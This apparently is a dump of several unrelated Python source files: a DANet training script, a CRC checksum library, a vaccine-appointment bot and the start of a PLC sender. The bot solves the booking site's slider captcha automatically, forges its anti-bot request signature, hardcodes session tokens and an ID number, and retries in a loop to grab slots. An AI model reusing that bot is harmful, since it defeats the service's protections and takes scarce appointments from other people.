torch.backends.cudnn.benchmark = True if len(args.gpu_id) < 2 else False
if args.config:
cfg.merge_from_file(args.config)
cfg.freeze()
task = cfg.task
seed = cfg.seed
train_config = {'dataset': cfg.dataset, 'resume_dir': cfg.resume_dir, 'logname': cfg.logname}
fit_config = dict(cfg.fit)
model_config = dict(cfg.model)
print('Using config: ', cfg)
return train_config, fit_config, model_config, task, seed, len(args.gpu_id)
def set_task_model(task, std=None, seed=1):
if task == 'classification':
clf = DANetClassifier(
optimizer_fn=QHAdam,
optimizer_params=dict(lr=fit_config['lr'], weight_decay=1e-5, nus=(0.8, 1.0)),
scheduler_params=dict(gamma=0.95, step_size=20),
scheduler_fn=torch.optim.lr_scheduler.StepLR,
layer=model_config['layer'],
base_outdim=model_config['base_outdim'],
k=model_config['k'],
drop_rate=model_config['drop_rate'],
seed=seed
)
eval_metric = ['accuracy']
elif task == 'regression':
clf = DANetRegressor(
std=std,
optimizer_fn=QHAdam,
optimizer_params=dict(lr=fit_config['lr'], weight_decay=fit_config['weight_decay'], nus=(0.8, 1.0)),
scheduler_params=dict(gamma=0.95, step_size=fit_config['schedule_step']),
scheduler_fn=torch.optim.lr_scheduler.StepLR,
layer=model_config['layer'],
base_outdim=model_config['base_outdim'],
k=model_config['k'],
seed=seed
)
eval_metric = ['mse']
return clf, eval_metric
if __name__ == '__main__':
print('===> Setting configuration ...')
train_config, fit_config, model_config, task, seed, n_gpu = get_args()
logname = None if train_config['logname'] == '' else train_config['dataset'] + '/' + train_config['logname']
print('===> Getting data ...')
X_train, y_train, X_valid, y_valid, X_test, y_test = get_data(train_config['dataset'])
mu, std = None, None
if task == 'regression':
mu, std = y_train.mean(), y_train.std()
print("mean = %.5f, std = %.5f" % (mu, std))
y_train = normalize_reg_label(y_train, std, mu)
y_valid = normalize_reg_label(y_valid, std, mu)
y_test = normalize_reg_label(y_test, std, mu)
clf, eval_metric = set_task_model(task, std, seed)
clf.fit(
X_train=X_train, y_train=y_train,
eval_set=[(X_valid, y_valid)],
eval_name=['valid'],
eval_metric=eval_metric,
max_epochs=fit_config['max_epochs'], patience=fit_config['patience'],
batch_size=fit_config['batch_size'], virtual_batch_size=fit_config['virtual_batch_size'],
logname=logname,
resume_dir=train_config['resume_dir'],
n_gpu=n_gpu
)
preds_test = clf.predict(X_test)
if task == 'classification':
test_acc = accuracy_score(y_pred=preds_test, y_true=y_test)
print(f"FINAL TEST ACCURACY FOR {train_config['dataset']} : {test_acc}")
elif task == 'regression':
test_mse = mean_squared_error(y_pred=preds_test, y_true=y_test)
print(f"FINAL TEST MSE FOR {train_config['dataset']} : {test_mse}")
``` |
{
"source": "1484076353/PyCRC",
"score": 3
} |
#### File: PyCRC/PyCRC/crc.py
```python
from PyCRC import *
class CRC:
@classmethod
def CRC(cls, check_str, model=None, ascii=False):
global bytes
if ascii: # 传入参数为字符串
try:
bytes = [ord(item) for item in check_str]
except Exception:
raise
else:
check_hex = check_str.replace(' ', '')
try:
bytes = [int(check_hex[i:i + 2], 16) for i in range(0, len(check_hex), 2)]
except Exception:
raise
if model == CRC_4_ITU:
return cls()._crc_4_itu(bytes)
elif model == CRC_5_EPC:
return cls()._crc_5_epc(bytes)
elif model == CRC_5_ITU:
return cls()._crc_5_itu(bytes)
elif model == CRC_5_USB:
return cls()._crc_5_usb(bytes)
elif model == CRC_6_ITU:
return cls()._crc_6_itu(bytes)
elif model == CRC_7_MMC:
return cls()._crc_7_mmc(bytes)
elif model == CRC_8:
return cls()._crc_8(bytes)
elif model == CRC_8_ITU:
return cls()._crc_8_itu(bytes)
elif model == CRC_8_ROHC:
return cls()._crc_8_rohc(bytes)
elif model == CRC_8_MAXIM:
return cls()._crc_8_maxim(bytes)
elif model == CRC_16_IBM:
return cls()._crc_16_ibm(bytes)
elif model == CRC_16_MAXIM:
return cls()._crc_16_maxim(bytes)
elif model == CRC_16_USB:
return cls()._crc_16_usb(bytes)
elif model == CRC_16_MODBUS:
return cls()._crc_16_modbus(bytes)
elif model == CRC_16_CCITT:
return cls()._crc_16_ccitt(bytes)
elif model == CRC_16_CCITT_FALSE:
return cls()._crc_16_ccitt_false(bytes)
elif model == CRC_16_X25:
return cls()._crc_16_x25(bytes)
elif model == CRC_16_XMODEM:
return cls()._crc_16_xmodem(bytes)
elif model == CRC_16_DNP:
return cls()._crc_16_dnp(bytes)
elif model == CRC_32:
return cls()._crc_32(bytes)
elif model == CRC_32_MPEG_2:
return cls()._crc_32_mpeg_2(bytes)
else:
return None
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-4/ITU x4 + x + 1
# *Width: 4
# *Poly: 0x03
# *Init: 0x00
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_4_itu(self, bytes):
Width, Poly, Init, Refin, Refout = 4, 0x03, 0x00, True, False
Poly <<= (8 - Width)
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-5/EPC x5 + x3 + 1
# *Width: 5
# *Poly: 0x09
# *Init: 0x09
# *Xorout: 0x00
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_5_epc(self, bytes):
Width, Poly, Init, Refin, Refout = 5, 0x09, 0x09, False, False
Init <<= (8 - Width)
Poly <<= (8 - Width)
result = self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
return self._get_crc(Width, (int(result, 16) >> 3), Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-5/ITU x5 + x4 + x2 + 1
# *Width: 5
# *Poly: 0x15
# *Init: 0x00
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_5_itu(self, bytes):
Width, Poly, Init, Refin, Refout = 5, 0x15, 0x00, True, False
Poly <<= (8 - Width)
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-5/USB x5 + x2 + 1
# *Width: 5
# *Poly: 0x05
# *Init: 0x1F
# *Xorout: 0x1F
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_5_usb(self, bytes):
Width, Poly, Init, Xorout, Refin, Refout = 5, 0x05, 0x1F, 0x1F, True, False
Poly <<= (8 - Width)
result = self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
return self._get_crc(Width, (int(result, 16) ^ Xorout), Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-6/ITU x6 + x + 1
# *Width: 6
# *Poly: 0x03
# *Init: 0x00
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_6_itu(self, bytes):
Width, Poly, Init, Refin, Refout = 6, 0x03, 0x00, True, False
Poly <<= (8 - Width)
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-7/MMC x7 + x3 + 1
# *Width: 7
# *Poly: 0x09
# *Init: 0x00
# *Xorout: 0x00
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_7_mmc(self, bytes):
Width, Poly, Init, Refin, Refout = 7, 0x09, 0x00, False, False
Poly <<= (8 - Width)
result = self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
return self._get_crc(Width, (int(result, 16) >> 1), Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-8 x8 + x2 + x + 1
# *Width: 8
# *Poly: 0x07
# *Init: 0x00
# *Xorout: 0x00
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_8(self, bytes):
Width, Poly, Init, Refin, Refout = 8, 0x07, 0x00, False, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-8/ITU x8 + x2 + x + 1
# *Width: 8
# *Poly: 0x07
# *Init: 0x00
# *Xorout: 0x55
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_8_itu(self, bytes):
Width, Poly, Init, Xorout, Refin, Refout = 8, 0x07, 0x00, 0x55, False, False
result = self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
return self._get_crc(Width, (int(result, 16) ^ Xorout), Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-8/ROHC x8 + x2 + x + 1
# *Width: 8
# *Poly: 0x07
# *Init: 0xFF
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_8_rohc(self, bytes):
Width, Poly, Init, Refin, Refout = 8, 0x07, 0xFF, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-8/MAXIM x8 + x5 + x4 + 1
# *Width: 8
# *Poly: 0x31
# *Init: 0x00
# *Xorout: 0x00
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_8_maxim(self, bytes):
Width, Poly, Init, Refin, Refout = 8, 0x31, 0x00, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/IBM x16 + x15 + x2 + 1
# *Width: 16
# *Poly: 0x8005
# *Init: 0x0000
# *Xorout: 0x0000
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_ibm(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x8005, 0x0000, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/MAXIM x16 + x15 + x2 + 1
# *Width: 16
# *Poly: 0x8005
# *Init: 0x0000
# *Xorout: 0xFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_maxim(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x8005, 0x0000, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/USB x16 + x15 + x2 + 1
# *Width: 16
# *Poly: 0x8005
# *Init: 0xFFFF
# *Xorout: 0xFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_usb(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x8005, 0xFFFF, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/MODBUS x16 + x15 + x2 + 1
# *Width: 16
# *Poly: 0x8005
# *Init: 0xFFFF
# *Xorout: 0x0000
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_modbus(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x8005, 0xFFFF, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/CCITT x16 + x12 + x5 + 1
# *Width: 16
# *Poly: 0x1021
# *Init: 0x0000
# *Xorout: 0x0000
# *Refin: True
# *Refout: True False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_ccitt(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x1021, 0x0000, True, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/CCITT-FALSE x16 + x12 + x5 + 1
# *Width: 16
# *Poly: 0x1021
# *Init: 0xFFFF
# *Xorout: 0x0000
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_ccitt_false(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x1021, 0xFFFF, False, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/X25 x16 + x12 + x5 + 1
# *Width: 16
# *Poly: 0x1021
# *Init: 0xFFFF
# *Xorout: 0xFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_x25(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x1021, 0xFFFF, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/XMODEM x16 + x12 + x5 + 1
# *Width: 16
# *Poly: 0x1021
# *Init: 0x0000
# *Xorout: 0x0000
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_xmodem(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x1021, 0x0000, False, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-16/DNP x16 + x13 + x12 + x11 + x10 + x8 + x6 + x5 + x2 + 1
# *Width: 16
# *Poly: 0x3D65
# *Init: 0x0000
# *Xorout: 0xFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_16_dnp(self, bytes):
Width, Poly, Init, Refin, Refout = 16, 0x3D65, 0x0000, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-32 x32 + x26 + x23 + x22 + x16 + x12 + x11 + x10 + x8 + x7 + x5 + x4 + x2 + x + 1
# *Width: 32
# *Poly: 0x4C11DB7
# *Init: 0xFFFFFFF
# *Xorout: 0xFFFFFFF
# *Refin: True
# *Refout: True
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *
def _crc_32(self, bytes):
Width, Poly, Init, Refin, Refout = 32, 0x04C11DB7, 0xFFFFFFFF, True, True
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
# *Name: CRC-32/MPEG-2 x32 + x26 + x23 + x22 + x16 + x12 + x11 + x10 + x8 + x7 + x5 + x4 + x2 + x + 1
# *Width: 32
# *Poly: 0x4C11DB7
# *Init: 0xFFFFFFF
# *Xorout: 0x0000000
# *Refin: False
# *Refout: False
# ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** * /
def _crc_32_mpeg_2(self, bytes):
Width, Poly, Init, Refin, Refout = 32, 0x04C11DB7, 0xFFFFFFFF, False, False
return self._ufunc(bytes, Width, Poly, Init, Refin, Refout)
def _ufunc(self, bytes, Width, Poly, Init, Refin, Refout):
Poly = self._get_poly(Width, Poly, Refin)
scope = self._get_scope(Width, Refin)
offset = Width - 8
for buffer in bytes:
if Refin:
Init ^= buffer
else:
Init ^= buffer << (offset if offset > 0 else 0)
Init = self._get_course(Init, scope, Width, Refin, Poly)
return self._get_crc(Width, Init, Refout)
def _get_poly(self, Width, Poly, Refin):
if Refin:
Poly = int((bin(Poly)[2:]).zfill(Width if Width > 8 else 8)[::-1], 2)
return Poly
def _get_scope(self, Width, Refin):
if not Refin:
return 1 << (Width - 1 if Width >= 8 else 7)
return 1
def _get_course(self, Init, scope, Width, Refin, Poly):
for index in range(0, 8):
if Init & scope:
if Refin:
Init >>= 1
else:
Init <<= 1
Init = self._get_equilong(Init, Width)
Init ^= Poly
else:
if Refin:
Init >>= 1
else:
Init <<= 1
Init = self._get_equilong(Init, Width)
return Init
def _get_equilong(self, src, Width):
Width = Width if Width > 8 else 8
return int(bin(src)[2:].zfill(Width)[-Width:], 2)
def _get_crc(self, Width, Init, Refout):
real_width = Width
Width = Width if Width > 8 else 8
result = bin(Init)[2:].zfill(Width)
if Refout:
result = result.replace("0", "2").replace("1", "0").replace("2", "1")
Init = int(result[-Width:], 2)
length = real_width // 4 if real_width % 4 == 0 else (real_width // 4 + 1)
return (hex(Init)[2:]).zfill(Width // 4).upper()[-length:]
``` |
{
"source": "1486308032/yuemiao",
"score": 2
} |
#### File: 1486308032/yuemiao/main.py
```python
import json
import sys
import requests
import time
from hashlib import md5
import random
import captcha
import image
__value__ = {
"vaccineCode": "0208", # 0208
"vaccineIndex": "1", # 接种第几针
"linkmanId": "26605318", # 26605318
"subscribeDate": "2022-05-27",
"subscirbeTime": "2004 ", # GET 选择时间段时 响应body的Data ID
"departmentVaccineId": "9904", # 9904 10339
"depaCode": "4201050012", # 4202040003_b3f3799d4320171be60039325023fa67
# 时间+subscirbeTime+abcd md5 2022030500482004fuckhacker10000
"serviceFee": "0",
"ticket": "28331688:26605318:4202040003:9904___1646412476944",
"channelCode": "yyymsg",
"idCardNo": "4211234612321313", # 身份证号码
"captchaVerification": "<KEY>
# 待加密文本:token+验证码坐标 <PASSWORD>---{"x":164.96428571428572,"y":5} 密钥:5GDh59HsZQ8CaJtD
"token": "9beeae52e806454c8afcc44d93abd762",
}
def getConfig():
head = {
"Host": "wx.scmttec.com",
"user-agent": "Mozilla/5.0 (Linux; Android 11) AppleWebKit/537.36 ("
"KHTML, like Gecko) Version/4.0 Chrome/87.0.4240.99 XWEB/3225 MMWEBSDK/20220402 Mobile "
"Safari/537.36 MMWEBID/9813 MicroMessenger/8.1.22.2140(0x280016E6) WeChat/arm64 Weixin "
"NetType/4G Language/zh_CN ABI/arm64",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/wxpic,image/tpg,image/webp,"
"image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 ",
"x-requested-with": "com.tencent.mm",
"referer": "https://wx.scmttec.com/index.html",
"tk": "wxtoken:3117786a5086286af91ee9fe547793c8_e072d4f9ae73476bc59a8b86c8600d6d",
"st": md5(time.strftime("%Y-%m-%d %H:%M:%S").encode("utf8")).hexdigest(),
"cookie": "_xzkj_=wxtoken:3117786a5086286af91ee9fe547793c8_<PASSWORD>",
"accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7"
}
return head
def getIndex():
url = "https://wx.scmttec.com/index.html"
head = getConfig()
r = requests.get(url, headers=head)
r.encoding = "utf8"
print(r.text)
with open('./test.html', "w+", encoding="utf8") as f:
f.write(r.text)
# 疫苗医院列表页面 经纬度:附近的医院,name:根据名称搜索
def getDepartments():
url = "https://wx.scmttec.com/department/department/getDepartments.do"
url2 = "http://httpbin.org/post"
head = getConfig()
data = {
"offset": "0",
"limit": "10",
"name": "",
"regionCode": "4202",
"isOpen": "1",
"longitude": "115.01461",
"latitude": "30.210896",
"sortType": "1",
"vaccineCode": "",
"customId": "30",
}
r = requests.post(url=url, headers=head, data=data)
r.encoding = "utf8"
print(r.text)
a = json.loads(r.text)
for i in a.get("data").get("rows"):
name = i.get("name")
vaccineName = i.get("vaccineName")
code = i.get("code")
address = i.get("address")
depaVaccId = i.get("depaVaccId")
print(address)
# 疫苗医院详情页面
def getBaseInfo():
url = "https://wx.scmttec.com/base/departmentVaccine/item.do"
data = {
"id": __value__.get("departmentVaccineId"),
"isShowDescribtion": "true",
"showOthers": "true"
}
head = getConfig()
r = requests.get(url, headers=head, params=data)
r.encoding = "utf8"
print(r.text)
print(r.url)
res = json.loads(r.text)
__value__["vaccineCode"] = res["data"]["vaccineCode"]
__value__["depaCode"] = res["data"]["departmentCode"] # 待补充,提交订单需加时间戳md5
print("当前选中:", res["data"]["departmentName"], res["data"]["name"])
# 账号下添加的用户身份信息
def findByUserId():
url = "https://wx.scmttec.com/order/linkman/findByUserId.do" # ?userId=28331687
head = getConfig()
r = requests.get(url, headers=head)
a = json.loads(r.text)
for i in a.get("data"):
id = i.get("id")
username = i.get("name")
print(id, username)
# 能否订阅
def isCanSubscribe():
url = "https://wx.scmttec.com/subscribe/subscribe/isCanSubscribe.do"
head = getConfig()
data = { # 医院详情页面
"id": __value__["departmentVaccineId"], # 医院ID
"depaCode": __value__["depaCode"], # 行政区划代码
"vaccineCode": __value__["vaccineCode"], # 疫苗ID
"linkmanId": __value__["linkmanId"], # 用户身份ID
}
r = requests.get(url, headers=head, params=data)
a = json.loads(r.text)
i = a.get("data")
canSubscribe = i.get("canSubscribe")
ticket = i.get("ticket")
__value__["ticket"] = ticket
print("能否订阅:", canSubscribe, ticket)
# 订单页面 可选日期
def getWorkDay():
url = "https://wx.scmttec.com/order/subscribe/workDaysByMonth.do"
head = getConfig()
data = {
"depaCode": __value__["depaCode"],
"linkmanId": __value__["linkmanId"],
"vaccCode": __value__["vaccineCode"],
"vaccIndex": __value__["vaccineIndex"],
"departmentVaccineId": __value__["departmentVaccineId"],
"month": "2022-05-1",
}
r = requests.get(url, headers=head, params=data)
print("订单页面 可选日期", r.text)
a = json.loads(r.text)
i = a.get("data").get("dateList")
__value__["subscribeDate"] = i[1]
# 订单页面 可选日期的具体时间
def getWorkTime():
url = "https://wx.scmttec.com/subscribe/subscribe/departmentWorkTimes2.do"
head = getConfig()
data = {
"depaCode": __value__["depaCode"],
"vaccCode": __value__["vaccineCode"],
"vaccIndex": __value__["vaccineIndex"],
"subsribeDate": __value__["subscribeDate"],
"departmentVaccineId": __value__["departmentVaccineId"],
"linkmanId": __value__["linkmanId"],
"idCardNo": __value__["idCardNo"],
}
r = requests.get(url, headers=head, params=data)
print("具体日期:", r.text)
a = json.loads(r.text)
if a["ok"] == False:
print(a["msg"])
else:
i = a.get("data").get("times").get("data")
__value__["subscirbeTime"] = i[0]["id"]
# 随机生成UUID
def createUUID():
uuid = []
for i in range(36):
j = random.randint(0, 15)
uuid += "0123456789abcdef"[j]
uuid[14] = "4"
try:
uuid[19] = int(uuid[19])
# print("尝试",uuid[19])
except:
uuid[19] = random.randint(0, 9)
# print("修改",uuid[19])
uuid[19] = "0123456789abcdef"[3 & uuid[19] | 8]
uuid[8] = uuid[13] = uuid[18] = uuid[23] = "-"
return ("slider-" + "".join(uuid))
# 获取验证码
def getCaptcha():
url = "https://wx.scmttec.com/captcha/captcha/v2/get.do"
url2 = "http://httpbin.org/post"
head = getConfig()
timestamp = time.time()
timestamp = int(timestamp * 1000)
data = {
"captchaType": "blockPuzzle",
"clientUid": "slider-f893f399-33d9-485f-8b27-7327e8cb82c0", # "slider-f893f399-33d9-485f-8b27-7327e8cb82c0",此处可替换为createUUID(),随机一个UUID()
"ts": int(timestamp)
}
r = requests.post(url, headers=head, json=data)
a = json.loads(r.text)
# print(r.text)
i = a.get("data").get("repData")
print("获取验证码:", i)
__value__["token"] = i.get("token")
return i
# 发送验证码
def checkCaptcha(token=None, point_text=None):
url = "https://wx.scmttec.com/captcha/captcha/v2/check.do"
head = getConfig()
data = {
"captchaType": "blockPuzzle",
"pointJson": point_text,
"token": token
}
r = requests.post(url, headers=head, json=data)
a = json.loads(r.text)
print("验证码结果:", r.text)
i = a.get("data").get("repData")
return i
# 验证码检验
def orderCheck():
i = getCaptcha()
captcha.b64ToImage(i)
token = i.get("token")
key = i.get("secretKey")
# print("key ", key, "token ", token)
x = image.readImage()
num = random.uniform(0.5111111111111, 0.9115111111111)
point_x = ("%.13f") % (float(x) + num)
point_dict = {"x": float(point_x), "y": 5}
raw_text = json.dumps(point_dict, separators=(',', ':')) # python会加入空格,影响结果
en_point_text = captcha.enPoint(raw_text, key)
res = checkCaptcha(point_text= en_point_text,token=token)
# en_point_text = captcha.enPoint(x, key)
# checkCaptcha(token, en_point_text)
captchaVerification = captcha.enPoint(token + "---" + raw_text, key)
__value__["captchaVerification"] = captchaVerification
def nowTime():
url = "https://wx.scmttec.com/base//time/now.do"
head = getConfig()
r = requests.get(url, headers=head)
time = json.loads(r.text).get("data")
return time
"""----------------提交购买参数----------------"""
def subscribeAdd():
url = "https://wx.scmttec.com/subscribe/subscribe/add.do"
end = 'fuckhacker10000'
head = getConfig()
data = __value__
# times = nowTime()
# times = times.replace('-', '').replace(' ', '').replace(':', '')[0:12]
times = time.strftime("%Y%m%d%H%M")
times = times + str(__value__["subscirbeTime"]) + end
times = md5(times.encode("utf8")).hexdigest()
data["depaCode"] = data["depaCode"] + "_" + times
while True:
if int(time.strftime("%H%M%S")) > int("163000") or 1:
r = requests.get(url, headers=head, params=data)
break
else:
print("等待提交订单")
print("购买结果", r.text)
return r.text
def startSubscribe():
getBaseInfo()
isCanSubscribe()
if int(time.strftime("%H%M%S")) > int("163000") or 1: #简单的时间控制,16点30分00秒之后开始运行,or 1 则忽略时间直接运行
getWorkDay()
getWorkTime()
# orderCheck()
res = subscribeAdd()
return res
if __name__ == '__main__':
orderCheck()
i = 0
while True:
i = i + 1
if int(time.strftime("%H%M%S")) >= int("162958") or 1:#简单的时间控制,16点29分58秒之后开始运行,or 1 则忽略时间直接运行
try:
time.sleep(0.2)
print("[Info]:尝试运行")
res = startSubscribe()
res = json.loads(res)
except BaseException as e:
with open("out.log", "a+", encoding="utf8") as f:
print("[Error]:跳过循环", sys.exc_info())
print("[Error]:跳过循环", sys.exc_info(), file=f)
time.sleep(5)
continue
if res["code"] == "0000" or res["code"] == "9999":
print("[Success]:退出循环")
break
else:
print(res["msg"])
else:
print("<", i)
print(__value__)
``` |
{
"source": "1487quantum/packml_ros2",
"score": 2
} |
#### File: packml_plc/packml_plc/packml_plc_sender.py
```python
import time
from opcua import Client, ua
from packml_msgs.srv import Transition
import rclpy
